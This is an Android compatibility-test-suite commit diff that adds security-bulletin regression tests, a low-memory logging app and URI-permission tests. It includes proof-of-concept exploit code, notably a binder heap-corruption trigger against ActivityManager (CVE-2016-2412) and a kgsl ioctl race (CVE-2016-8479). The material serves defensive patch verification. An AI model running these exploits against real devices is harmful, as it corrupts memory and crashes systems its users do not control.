Merge "Merge "App Standby Settings key is set incorrectly" into pie-cts-dev am: 8f74ba97f8" am: 0f42165611
am: cb71ac669c
Change-Id: Ic4c3726146136835ee78c82020a0c4f773033310
diff --git a/apps/OomCatcher/Android.mk b/apps/OomCatcher/Android.mk
new file mode 100644
index 0000000..7f47e03
--- /dev/null
+++ b/apps/OomCatcher/Android.mk
@@ -0,0 +1,33 @@
+#
+# Copyright (C) 2018 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+
+LOCAL_PATH:= $(call my-dir)
+include $(CLEAR_VARS)
+
+LOCAL_MODULE_TAGS := optional
+
+LOCAL_MODULE_PATH := $(TARGET_OUT_DATA_APPS)
+
+LOCAL_SRC_FILES := $(call all-java-files-under, src)
+
+LOCAL_PACKAGE_NAME := OomCatcher
+
+LOCAL_SDK_VERSION := current
+
+LOCAL_COMPATIBILITY_SUITE := cts sts
+
+include $(BUILD_CTS_PACKAGE)
+
diff --git a/apps/OomCatcher/AndroidManifest.xml b/apps/OomCatcher/AndroidManifest.xml
new file mode 100644
index 0000000..25513e2
--- /dev/null
+++ b/apps/OomCatcher/AndroidManifest.xml
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="utf-8"?>
+
+<!-- Copyright (C) 2018 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="com.android.cts.oomcatcher"
+ android:versionCode="1"
+ android:versionName="1.0">
+
+ <application>
+ <activity android:name=".OomCatcher">
+ <intent-filter>
+ <action android:name="android.intent.action.MAIN" />
+ <category android:name="android.intent.category.LAUNCHER" />
+ </intent-filter>
+ </activity>
+ </application>
+</manifest>
diff --git a/apps/OomCatcher/src/com/android/cts/oomcatcher/OomCatcher.java b/apps/OomCatcher/src/com/android/cts/oomcatcher/OomCatcher.java
new file mode 100644
index 0000000..53ec140
--- /dev/null
+++ b/apps/OomCatcher/src/com/android/cts/oomcatcher/OomCatcher.java
@@ -0,0 +1,103 @@
+/*
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.android.cts.oomcatcher;
+
+import android.app.Activity;
+import android.os.Bundle;
+import android.app.ActivityManager;
+import android.content.Context;
+import android.content.ComponentCallbacks2;
+import android.util.Log;
+import java.util.concurrent.atomic.AtomicBoolean;
+
+/*
+ * An App to report to logcat the lowmemory status. As soon as the app detects low memory, it
+ * immediately reports. In addition, it also reports every second.
+ */
+public class OomCatcher extends Activity implements ComponentCallbacks2 {
+
+ private static final String LOG_TAG = "OomCatcher";
+
+ private AtomicBoolean isOom = new AtomicBoolean(false);
+
+ Thread logThread;
+
+ public void onCreate(Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+ logThread = new Thread() {
+ @Override
+ public void run() {
+ while (true) {
+ logStatus();
+ try {
+ Thread.sleep(1000); // 1 second
+ } catch (InterruptedException e) {
+ // thread has been killed
+ }
+ }
+ }
+ };
+ logThread.setDaemon(true);
+ logThread.start();
+ }
+
+ public void onDestroy() {
+ if (logThread != null) {
+ logThread.interrupt();
+ }
+ }
+
+ /*
+ * Receive memory callbacks from the Android system. All report low memory except for
+ * TRIM_MEMORY_UI_HIDDEN, which reports when the app is in the background. We don't care about
+ * that, only when the device is at risk of OOMing.
+ *
+ * For all indications of low memory, onLowMemory() is called.
+ */
+ @Override
+ public void onTrimMemory(int level) {
+ switch (level) {
+ case TRIM_MEMORY_COMPLETE:
+ case TRIM_MEMORY_MODERATE:
+ case TRIM_MEMORY_BACKGROUND:
+ case TRIM_MEMORY_RUNNING_CRITICAL:
+ case TRIM_MEMORY_RUNNING_LOW:
+ case TRIM_MEMORY_RUNNING_MODERATE:
+ //fallthrough
+ onLowMemory();
+ break;
+ case TRIM_MEMORY_UI_HIDDEN:
+ default:
+ return;
+ }
+ }
+
+ /*
+ * An earlier API implementation of low memory callbacks. Sets oom status and logs.
+ */
+ @Override
+ public void onLowMemory() {
+ isOom.set(true);
+ logStatus();
+ }
+
+ /*
+ * Log to logcat the current lowmemory status of the app.
+ */
+ private void logStatus() {
+ Log.i(LOG_TAG, isOom.get() ? "Low memory" : "Normal memory");
+ }
+}
diff --git a/hostsidetests/appsecurity/test-apps/UsePermissionDiffCert/src/com/android/cts/usespermissiondiffcertapp/AccessPermissionWithDiffSigTest.java b/hostsidetests/appsecurity/test-apps/UsePermissionDiffCert/src/com/android/cts/usespermissiondiffcertapp/AccessPermissionWithDiffSigTest.java
index 80a1578..355de8c 100644
--- a/hostsidetests/appsecurity/test-apps/UsePermissionDiffCert/src/com/android/cts/usespermissiondiffcertapp/AccessPermissionWithDiffSigTest.java
+++ b/hostsidetests/appsecurity/test-apps/UsePermissionDiffCert/src/com/android/cts/usespermissiondiffcertapp/AccessPermissionWithDiffSigTest.java
@@ -141,6 +141,16 @@
}
}
+ private void assertContentUriAllowed(Uri uri) {
+ assertReadingContentUriAllowed(uri);
+ assertWritingContentUriAllowed(uri);
+ }
+
+ private void assertContentUriNotAllowed(Uri uri, String msg) {
+ assertReadingContentUriNotAllowed(uri, msg);
+ assertWritingContentUriNotAllowed(uri, msg);
+ }
+
private void assertWritingContentUriNotAllowed(Uri uri, String msg) {
final ContentResolver resolver = getContext().getContentResolver();
try {
@@ -487,10 +497,18 @@
}
private void doTestGrantUriPermissionFail(Uri uri) {
- grantUriPermissionFail(uri, Intent.FLAG_GRANT_READ_URI_PERMISSION, false);
- grantUriPermissionFail(uri, Intent.FLAG_GRANT_WRITE_URI_PERMISSION, false);
- grantUriPermissionFail(uri, Intent.FLAG_GRANT_READ_URI_PERMISSION, true);
- grantUriPermissionFail(uri, Intent.FLAG_GRANT_WRITE_URI_PERMISSION, true);
+ for (boolean service : new boolean[] { false, true }) {
+ for (int flags : new int[] {
+ Intent.FLAG_GRANT_READ_URI_PERMISSION, Intent.FLAG_GRANT_WRITE_URI_PERMISSION
+ }) {
+ grantUriPermissionFail(uri,
+ flags, service);
+ grantUriPermissionFail(uri,
+ flags | Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION, service);
+ grantUriPermissionFail(uri,
+ flags | Intent.FLAG_GRANT_PREFIX_URI_PERMISSION, service);
+ }
+ }
}
/**
@@ -1162,6 +1180,26 @@
}
/**
+ * Test that shady {@link Uri} are blocked by {@code path-permission}.
+ */
+ public void testRestrictingProviderMatchingShadyPaths() {
+ assertContentUriAllowed(
+ Uri.parse("content://ctspermissionwithsignaturepathrestricting/"));
+ assertContentUriAllowed(
+ Uri.parse("content://ctspermissionwithsignaturepathrestricting//"));
+ assertContentUriAllowed(
+ Uri.parse("content://ctspermissionwithsignaturepathrestricting///"));
+ assertContentUriNotAllowed(
+ Uri.parse("content://ctspermissionwithsignaturepathrestricting/foo"), null);
+ assertContentUriNotAllowed(
+ Uri.parse("content://ctspermissionwithsignaturepathrestricting//foo"), null);
+ assertContentUriNotAllowed(
+ Uri.parse("content://ctspermissionwithsignaturepathrestricting///foo"), null);
+ assertContentUriNotAllowed(
+ Uri.parse("content://ctspermissionwithsignaturepathrestricting/foo//baz"), null);
+ }
+
+ /**
* Verify that at least one {@code path-permission} rule will grant access,
* even if the caller doesn't hold another matching {@code path-permission}.
*/
diff --git a/hostsidetests/security/Android.mk b/hostsidetests/security/Android.mk
index cdf71dc..8bef613 100644
--- a/hostsidetests/security/Android.mk
+++ b/hostsidetests/security/Android.mk
@@ -21,7 +21,7 @@
LOCAL_MODULE_TAGS := optional
# tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts vts general-tests sts
+LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
# Must match the package name in CtsTestCaseList.mk
LOCAL_MODULE := CtsSecurityHostTestCases
diff --git a/hostsidetests/securitybulletin/Android.mk b/hostsidetests/securitybulletin/Android.mk
index a07fbbd..fc814a5 100644
--- a/hostsidetests/securitybulletin/Android.mk
+++ b/hostsidetests/securitybulletin/Android.mk
@@ -23,7 +23,7 @@
LOCAL_MODULE_TAGS := optional
# tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_COMPATIBILITY_SUITE := cts vts general-tests sts
# Must match the package name in CtsTestCaseList.mk
LOCAL_MODULE := CtsSecurityBulletinHostTestCases
diff --git a/hostsidetests/securitybulletin/AndroidTest.xml b/hostsidetests/securitybulletin/AndroidTest.xml
index 0c9ebe3..6e724ed 100644
--- a/hostsidetests/securitybulletin/AndroidTest.xml
+++ b/hostsidetests/securitybulletin/AndroidTest.xml
@@ -41,6 +41,7 @@
<!-- Bulletin 2016-04 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+ <option name="push" value="CVE-2016-2412->/data/local/tmp/CVE-2016-2412" />
<option name="push" value="CVE-2016-0844->/data/local/tmp/CVE-2016-0844" />
<option name="push" value="CVE-2016-2419->/data/local/tmp/CVE-2016-2419" />
@@ -50,6 +51,10 @@
<option name="push" value="CVE-2016-2460->/data/local/tmp/CVE-2016-2460" />
<!--__________________-->
+ <!-- Bulletin 2016-06 -->
+ <!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+
+ <!--__________________-->
<!-- Bulletin 2016-07 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
<option name="push" value="CVE-2016-3809->/data/local/tmp/CVE-2016-3809" />
@@ -57,6 +62,7 @@
<!-- Bulletin 2016-09 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+ <option name="push" value="CVE-2015-8839->/data/local/tmp/CVE-2015-8839" />
<option name="push" value="CVE-2016-2471->/data/local/tmp/CVE-2016-2471" />
<!--__________________-->
@@ -66,6 +72,7 @@
<!--__________________-->
<!-- Bulletin 2016-11 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+ <option name="push" value="CVE-2012-6702->/data/local/tmp/CVE-2012-6702" />
<!--__________________-->
<!-- Bulletin 2016-12 -->
@@ -78,11 +85,13 @@
<!--__________________-->
<!-- Bulletin 2017-02 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+ <option name="push" value="CVE-2017-0415->/data/local/tmp/CVE-2017-0415" />
<option name="push" value="CVE-2017-0426->/data/local/tmp/CVE-2017-0426" />
<!--__________________-->
<!-- Bulletin 2017-03 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+ <option name="push" value="CVE-2017-0477->/data/local/tmp/CVE-2017-0477" />
<option name="push" value="CVE-2017-0479->/data/local/tmp/CVE-2017-0479" />
<option name="push" value="CVE-2017-0334->/data/local/tmp/CVE-2017-0334" />
<option name="push" value="CVE-2016-8479->/data/local/tmp/CVE-2016-8479" />
@@ -138,6 +147,7 @@
<!--__________________-->
<!-- Bulletin 2018-02 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+ <option name="push" value="CVE-2017-13273->/data/local/tmp/CVE-2017-13273" />
<option name="push" value="CVE-2017-13232->/data/local/tmp/CVE-2017-13232" />
<!--__________________-->
@@ -145,9 +155,37 @@
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
<option name="push" value="CVE-2017-13253->/data/local/tmp/CVE-2017-13253" />
+ <!--__________________-->
+ <!-- Bulletin 2018-07 -->
+ <!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+ <option name="push" value="CVE-2018-9424->/data/local/tmp/CVE-2018-9424" />
+
+ <!--__________________-->
+ <!-- Bulletin 2018-08 -->
+ <!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+
+ <!--__________________-->
+ <!-- Bulletin 2018-09 -->
+ <!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+
+ <!--__________________-->
+ <!-- Bulletin 2018-10 -->
+ <!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+ <option name="push" value="CVE-2018-9515->/data/local/tmp/CVE-2018-9515" />
+
<option name="append-bitness" value="true" />
</target_preparer>
+ <target_preparer class="com.android.tradefed.targetprep.suite.SuiteApkInstaller">
+ <option name="cleanup-apks" value="true" />
+ <option name="test-file-name" value="CtsHostLaunchAnyWhereApp.apk" />
+ </target_preparer>
+
+ <target_preparer class="com.android.tradefed.targetprep.suite.SuiteApkInstaller">
+ <option name="cleanup-apks" value="true" />
+ <option name="test-file-name" value="OomCatcher.apk" />
+ </target_preparer>
+
<test class="com.android.compatibility.common.tradefed.testtype.JarHostTest" >
<option name="jar" value="CtsSecurityBulletinHostTestCases.jar" />
<option name="runtime-hint" value="8m40s" />
diff --git a/hostsidetests/securitybulletin/res/CVE-2017-0477.gif b/hostsidetests/securitybulletin/res/CVE-2017-0477.gif
new file mode 100644
index 0000000..67bd51f
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/CVE-2017-0477.gif
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/CVE-2017-0647.zip b/hostsidetests/securitybulletin/res/CVE-2017-0647.zip
new file mode 100644
index 0000000..e01eaf4
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/CVE-2017-0647.zip
Binary files differ
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2012-6702/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2012-6702/Android.mk
new file mode 100644
index 0000000..dede1c7
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2012-6702/Android.mk
@@ -0,0 +1,39 @@
+# Copyright (C) 2018 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2012-6702
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+LOCAL_C_INCLUDES += $(TOP)/external/expat/lib/expat.h
+
+LOCAL_SHARED_LIBRARIES := \
+ libc \
+ libexpat \
+ liblog
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts sts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2012-6702/poc.c b/hostsidetests/securitybulletin/securityPatch/CVE-2012-6702/poc.c
new file mode 100644
index 0000000..ab83a0d
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2012-6702/poc.c
@@ -0,0 +1,52 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include "expat.h"
+#include <log/log.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+
+#define MAX_SIZE 20
+
+int main(void) {
+ XML_Parser parser;
+ int i;
+ int randomValues[MAX_SIZE];
+ int isDistinctive = 0;
+
+ for (i = 0; i < MAX_SIZE; i++) {
+ parser = XML_ParserCreate("UTF-8");
+ XML_Parse(parser, "", 0, 1);
+ XML_ParserFree(parser);
+ randomValues[i] = rand();
+ }
+
+ for (i = 1; i < MAX_SIZE; i++) {
+ if (randomValues[0] != randomValues[i]) {
+ isDistinctive |= 1;
+ }
+ }
+
+ if (isDistinctive == 0) {
+ //encountered similar values
+ ALOGE("fail: encountered same random values!");
+ return -1;
+ }
+
+ return 0;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2015-8839/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2015-8839/Android.mk
new file mode 100755
index 0000000..65fe025
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2015-8839/Android.mk
@@ -0,0 +1,36 @@
+# Copyright (C) 2018 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2015-8839
+LOCAL_SRC_FILES := poc.c
+
+LOCAL_SHARED_LIBRARIES := libcutils \
+ liblog
+
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts sts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror
+LOCAL_LDFLAGS += -fPIE -pie
+LOCAL_LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2015-8839/poc.c b/hostsidetests/securitybulletin/securityPatch/CVE-2015-8839/poc.c
new file mode 100755
index 0000000..c6a330f
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2015-8839/poc.c
@@ -0,0 +1,59 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <cutils/log.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <linux/falloc.h>
+#include <linux/magic.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/types.h>
+#include <sys/utsname.h>
+#include <sys/vfs.h>
+#include <unistd.h>
+
+int main(void) {
+ int fd = -1, result = -1;
+ char tmpFile[32];
+ struct statfs sfs;
+
+ memset(tmpFile, 0, sizeof(tmpFile));
+ strncpy(tmpFile, "/data/local/tmp/tmpFile", 24);
+
+ fd = open(tmpFile, O_WRONLY | O_APPEND | O_CREAT, 0644);
+ if (fd < 0) {
+ ALOGE("Creation of tmp file is failed [%s]", strerror(errno));
+ return -1;
+ }
+
+ fstatfs(fd, &sfs);
+ if (sfs.f_type == EXT4_SUPER_MAGIC) {
+ result = fallocate(fd, FALLOC_FL_PUNCH_HOLE | FALLOC_FL_KEEP_SIZE, 0, 1);
+ if (result < 0 && errno == EOPNOTSUPP) {
+ ALOGD("fallocate result [%s] errno [%d]", strerror(errno), errno);
+ ALOGE("fallocate result EOPNOTSUPP");
+ }
+ }
+
+ if (fd) {
+ close(fd);
+ }
+
+ return 0;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2412/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2412/Android.mk
new file mode 100644
index 0000000..77de47e
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2412/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2018 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-2412
+LOCAL_SRC_FILES := poc.cpp
+
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+LOCAL_SHARED_LIBRARIES := libbinder \
+ libutils
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts sts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror
+
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2412/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2412/poc.cpp
new file mode 100644
index 0000000..7e3b067
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2412/poc.cpp
@@ -0,0 +1,99 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+
+#include <binder/IServiceManager.h>
+#include <binder/Parcel.h>
+
+using namespace android;
+typedef enum TRANTYPE { HEAPSPRAY, HEAPCORRUPT, HEAPFENGSHUI } TRANTYPE;
+
+static void writeParcelableHead(Parcel *pData, const char *class_name) {
+ // write key
+ static int count = 1;
+ const int VAL_PARCELABLE = 4;
+ char buffer[16] = {0};
+ snprintf(buffer, 16, "%d", count);
+
+ pData->writeString16(String16((const char *)buffer));
+ pData->writeInt32(VAL_PARCELABLE);
+ pData->writeString16(String16(class_name));
+}
+
+void writeRegion(Parcel *pData) {
+ pData->writeInt32(100); // length of region;
+ pData->writeInt32(
+ 0x3fffffff); // runCount, the allocted size will be 0x3fffffff*4+16=0xc
+ pData->writeInt32(0xf); // fBounds
+ pData->writeInt32(0xf); // YSpanCount
+ pData->writeInt32(0xf); // IntervalCount
+
+ char buffer[100];
+ memset(buffer, 0xcc,
+ sizeof(buffer)); // this buffer will be used to corrrupt the heap
+ pData->write(buffer, sizeof(buffer));
+}
+
+static void writeBundle(Parcel *pData, int type) {
+ size_t lengthPos = pData->dataPosition();
+ pData->writeInt32(0xfffff);
+ const int BUNDLE_MAGIC = 0x4C444E42;
+ pData->writeInt32(BUNDLE_MAGIC);
+ size_t startPos = pData->dataPosition();
+
+ if (type == HEAPCORRUPT) {
+ pData->writeInt32(1); // from writeArrayMapInternal,object numbers in bundle
+ writeParcelableHead(pData, "android.graphics.Region");
+ writeRegion(pData);
+ } else { // other than HEAPCORRUPT
+ exit(0);
+ }
+
+ size_t endPos = pData->dataPosition();
+ // Backpatch length
+ pData->setDataPosition(lengthPos);
+ int length = endPos - startPos;
+ pData->writeInt32(length);
+ pData->setDataPosition(endPos);
+}
+
+static void transact(sp<IBinder> &service, TRANTYPE type) {
+ const int CONVERT_TO_TRANSLUCENT_TRANSACTION = 175;
+ Parcel data, reply;
+
+ data.writeInterfaceToken(String16("android.app.IActivityManager"));
+ data.writeStrongBinder(service);
+ data.writeInt32(333);
+ writeBundle(&data, type);
+ service->transact(CONVERT_TO_TRANSLUCENT_TRANSACTION, data, &reply);
+}
+
+int main(__attribute__((unused)) int argc,
+ __attribute__((unused)) char *const argv[]) {
+ sp<IServiceManager> sm = defaultServiceManager();
+ sp<IBinder> service = sm->checkService(String16("activity"));
+ if (service != NULL) {
+ printf("heap corruption\n");
+ transact(service, HEAPCORRUPT);
+ } else {
+ printf("get activitymanger failed\n");
+ }
+ return 0;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-8479/poc.c b/hostsidetests/securitybulletin/securityPatch/CVE-2016-8479/poc.c
index 94202f6..5d4ded3 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2016-8479/poc.c
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-8479/poc.c
@@ -26,6 +26,7 @@
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
+#include "../includes/common.h"
#define THREAD_NUM 600
#define DEV "/dev/kgsl-3d0"
@@ -124,39 +125,46 @@
void* child_ioctl_0(void* no_use) {
int ret = 1;
+ time_t test_started = start_timer();
struct kgsl_drawctxt_destroy kdd = {0};
kdd.drawctxt_id = kgsl_id;
set_affinity(1);
- while (1) {
+ while (is_timer_expired(test_started)) {
ret = ioctl(fd, IOCTL_KGSL_DRAWCTXT_DESTROY, &kdd);
}
+ return NULL;
}
void* child_ioctl_1(void* no_use) {
int ret = 1;
+ time_t test_started = start_timer();
struct kgsl_drawctxt_destroy kdd = {0};
kdd.drawctxt_id = kgsl_id;
set_affinity(2);
- while (1) {
+ while (is_timer_expired(test_started)) {
ret = ioctl(fd, IOCTL_KGSL_DRAWCTXT_DESTROY, &kdd);
}
+ return NULL;
}
void* child_ioctl_2(void* no_use) {
int ret = 1;
+ time_t test_started = start_timer();
struct kgsl_drawctxt_create kdc = {0, 0};
kdc.flags = KGSL_CONTEXT_PREAMBLE | KGSL_CONTEXT_NO_GMEM_ALLOC;
set_affinity(3);
- while (1) {
+ while (is_timer_expired(test_started)) {
ret = ioctl(fd, IOCTL_KGSL_DRAWCTXT_CREATE, &kdc);
kgsl_id = kdc.drawctxt_id;
}
+ return NULL;
}
int main() {
int i, ret;
+ time_t test_started = start_timer();
struct kgsl_drawctxt_create kdc = {0, 0};
kdc.flags = KGSL_CONTEXT_PREAMBLE | KGSL_CONTEXT_NO_GMEM_ALLOC;
struct kgsl_drawctxt_destroy kdd = {0};
@@ -179,8 +187,12 @@
pthread_create(thread_id + i + 2, NULL, child_ioctl_2, NULL);
}
- while (1) {
+ while (is_timer_expired(test_started)) {
ret = ioctl(fd, IOCTL_KGSL_DRAWCTXT_CREATE, &kdc);
kgsl_id = kdc.drawctxt_id;
}
+
+ close(fd);
+
+ return 0;
}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-0415/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0415/Android.mk
new file mode 100644
index 0000000..e3884e6
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0415/Android.mk
@@ -0,0 +1,40 @@
+# Copyright (C) 2018 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0415
+LOCAL_SRC_FILES := poc.cpp
+
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+LOCAL_SHARED_LIBRARIES := libutils \
+ libui \
+ libgui \
+ libmedia
+
+LOCAL_C_INCLUDES:= \
+ $(TOP)/frameworks/native/include/media/openmax
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts sts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror
+
+include $(BUILD_CTS_EXECUTABLE)
